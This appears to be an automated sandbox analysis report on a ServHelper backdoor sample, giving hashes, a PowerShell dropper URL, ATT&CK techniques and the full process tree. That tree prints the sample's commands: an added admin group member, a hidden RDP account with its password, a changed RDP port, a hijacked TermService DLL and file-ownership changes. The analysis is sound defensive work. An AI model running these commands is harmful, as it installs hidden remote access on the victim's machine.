servhelper | 266562d82899806c0eafc3ca72216e78d41403dd24effebd31d7635922ba96ce

Analysis

max time kernel
86s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
01-02-2024 22:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

87dd0632a95ca24443f8c6363bc055e6.exe
Size

5.9MB
MD5

87dd0632a95ca24443f8c6363bc055e6
SHA1

423785b67d20f4f5056ff6d9e34fda3c72a03bd4
SHA256

266562d82899806c0eafc3ca72216e78d41403dd24effebd31d7635922ba96ce
SHA512

c51d180cca074540f5ca9186e60509cfdb1c7e1a8651e691eac585df9f8352e256cedb86a4a340e0e8f5b1ed6d73ff270d92424259539c0c4c02a7048f2a75e2
SSDEEP

49152:uM+J9Grb/TkvO90dL3BmAFd4A64nsfJte35ke4/Dirx5WgzPpvYhWQ2duQNH9AT:uM++eamAQQQQQQQQQQQQQ

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 7 IoCs

flow	pid	Process
34	1628	powershell.exe
36	1628	powershell.exe
38	1628	powershell.exe
42	1628	powershell.exe
44	1628	powershell.exe
46	1628	powershell.exe
48	1628	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
1156	icacls.exe
4436	icacls.exe
1784	icacls.exe
224	takeown.exe
4272	icacls.exe
4088	icacls.exe
3952	icacls.exe
3936	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

pid	Process
1480	Process not Found
1480	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4088	icacls.exe
3952	icacls.exe
3936	icacls.exe
1156	icacls.exe
4436	icacls.exe
1784	icacls.exe
4272	icacls.exe
224	takeown.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023155-104.dat	upx
behavioral2/files/0x0008000000023161-105.dat	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
5	raw.githubusercontent.com
34	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 18 IoCs

description	ioc	Process
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIC805.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIC825.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_owny3eut.4h0.psm1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_4erqzggv.pya.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIC7B5.tmp	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIC7E5.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIC826.tmp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
512	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones,"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3624	reg.exe

Runs net.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc	stream
HTTP User-Agent header	36	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	38	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
2244	powershell.exe
2244	powershell.exe
2008	powershell.exe
2008	powershell.exe
4580	powershell.exe
4580	powershell.exe
4796	powershell.exe
4796	powershell.exe
2244	powershell.exe
2244	powershell.exe
2244	powershell.exe
1628	powershell.exe
1628	powershell.exe
1628	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
656	Process not Found
656	Process not Found

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	3452	87dd0632a95ca24443f8c6363bc055e6.exe
Token: SeDebugPrivilege	2244	powershell.exe
Token: SeDebugPrivilege	2008	powershell.exe
Token: SeDebugPrivilege	4580	powershell.exe
Token: SeDebugPrivilege	4796	powershell.exe
Token: SeRestorePrivilege	4088	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	512	WMIC.exe
Token: SeIncreaseQuotaPrivilege	512	WMIC.exe
Token: SeAuditPrivilege	512	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	512	WMIC.exe
Token: SeIncreaseQuotaPrivilege	512	WMIC.exe
Token: SeAuditPrivilege	512	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2372	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2372	WMIC.exe
Token: SeAuditPrivilege	2372	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2372	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2372	WMIC.exe
Token: SeAuditPrivilege	2372	WMIC.exe
Token: SeDebugPrivilege	1628	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3452 wrote to memory of 2244	3452	87dd0632a95ca24443f8c6363bc055e6.exe	87
PID 3452 wrote to memory of 2244	3452	87dd0632a95ca24443f8c6363bc055e6.exe	87
PID 2244 wrote to memory of 5020	2244	powershell.exe	117
PID 2244 wrote to memory of 5020	2244	powershell.exe	117
PID 5020 wrote to memory of 3336	5020	cmd.exe	90
PID 5020 wrote to memory of 3336	5020	cmd.exe	90
PID 2244 wrote to memory of 2008	2244	powershell.exe	94
PID 2244 wrote to memory of 2008	2244	powershell.exe	94
PID 2244 wrote to memory of 4580	2244	powershell.exe	96
PID 2244 wrote to memory of 4580	2244	powershell.exe	96
PID 2244 wrote to memory of 4796	2244	powershell.exe	99
PID 2244 wrote to memory of 4796	2244	powershell.exe	99
PID 2244 wrote to memory of 224	2244	powershell.exe	113
PID 2244 wrote to memory of 224	2244	powershell.exe	113
PID 2244 wrote to memory of 4272	2244	powershell.exe	112
PID 2244 wrote to memory of 4272	2244	powershell.exe	112
PID 2244 wrote to memory of 4088	2244	powershell.exe	103
PID 2244 wrote to memory of 4088	2244	powershell.exe	103
PID 2244 wrote to memory of 1784	2244	powershell.exe	111
PID 2244 wrote to memory of 1784	2244	powershell.exe	111
PID 2244 wrote to memory of 4436	2244	powershell.exe	110
PID 2244 wrote to memory of 4436	2244	powershell.exe	110
PID 2244 wrote to memory of 1156	2244	powershell.exe	107
PID 2244 wrote to memory of 1156	2244	powershell.exe	107
PID 2244 wrote to memory of 3952	2244	powershell.exe	154
PID 2244 wrote to memory of 3952	2244	powershell.exe	154
PID 2244 wrote to memory of 3936	2244	powershell.exe	106
PID 2244 wrote to memory of 3936	2244	powershell.exe	106
PID 2244 wrote to memory of 4960	2244	powershell.exe	105
PID 2244 wrote to memory of 4960	2244	powershell.exe	105
PID 2244 wrote to memory of 3624	2244	powershell.exe	109
PID 2244 wrote to memory of 3624	2244	powershell.exe	109
PID 2244 wrote to memory of 2764	2244	powershell.exe	108
PID 2244 wrote to memory of 2764	2244	powershell.exe	108
PID 2244 wrote to memory of 2696	2244	powershell.exe	114
PID 2244 wrote to memory of 2696	2244	powershell.exe	114
PID 2696 wrote to memory of 4144	2696	net.exe	115
PID 2696 wrote to memory of 4144	2696	net.exe	115
PID 2244 wrote to memory of 1380	2244	powershell.exe	124
PID 2244 wrote to memory of 1380	2244	powershell.exe	124
PID 1380 wrote to memory of 4184	1380	cmd.exe	116
PID 1380 wrote to memory of 4184	1380	cmd.exe	116
PID 4184 wrote to memory of 3440	4184	cmd.exe	123
PID 4184 wrote to memory of 3440	4184	cmd.exe	123
PID 3440 wrote to memory of 3324	3440	net.exe	122
PID 3440 wrote to memory of 3324	3440	net.exe	122
PID 2244 wrote to memory of 892	2244	powershell.exe	118
PID 2244 wrote to memory of 892	2244	powershell.exe	118
PID 892 wrote to memory of 5020	892	cmd.exe	117
PID 892 wrote to memory of 5020	892	cmd.exe	117
PID 5020 wrote to memory of 3164	5020	cmd.exe	121
PID 5020 wrote to memory of 3164	5020	cmd.exe	121
PID 3164 wrote to memory of 3568	3164	net.exe	120
PID 3164 wrote to memory of 3568	3164	net.exe	120
PID 1872 wrote to memory of 4196	1872	cmd.exe	128
PID 1872 wrote to memory of 4196	1872	cmd.exe	128
PID 4196 wrote to memory of 3300	4196	net.exe	127
PID 4196 wrote to memory of 3300	4196	net.exe	127
PID 2204 wrote to memory of 4788	2204	cmd.exe	131
PID 2204 wrote to memory of 4788	2204	cmd.exe	131
PID 4788 wrote to memory of 4948	4788	net.exe	132
PID 4788 wrote to memory of 4948	4788	net.exe	132
PID 1520 wrote to memory of 3360	1520	cmd.exe	135
PID 1520 wrote to memory of 3360	1520	cmd.exe	135

C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe
"C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3452
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2244
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\opbuhnsc\opbuhnsc.cmdline"
    3⤵
    PID:5020
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES955A.tmp" "c:\Users\Admin\AppData\Local\Temp\opbuhnsc\CSC4CEEC8B53C634BC991DED38B989BFB39.TMP"
      4⤵
      PID:3336
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2008
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4580
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4796
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4088
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3952
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic CPU get NAME
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2372
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:4960
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3936
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1156
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2764
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:3624
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4436
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1784
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4272
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:224
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2696
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:4144
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:892
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1380
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:3632
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:4308

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
1⤵
- Suspicious use of WriteProcessMemory
PID:4184
- C:\Windows\system32\net.exe
  net start rdpdr
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3440

C:\Windows\system32\cmd.exe
cmd /c net start TermService
1⤵
- Suspicious use of WriteProcessMemory
PID:5020
- C:\Windows\system32\net.exe
  net start TermService
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
1⤵
PID:3568

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
1⤵
PID:3324

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:1872
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4196

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
1⤵
PID:3300

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 3jeu472T /add
1⤵
- Suspicious use of WriteProcessMemory
PID:2204
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 3jeu472T /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4788
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 3jeu472T /add
    3⤵
    PID:4948

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1520
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:3360
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:2604

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" IXMQMCCR$ /ADD
1⤵
PID:4444
- C:\Windows\system32\net.exe
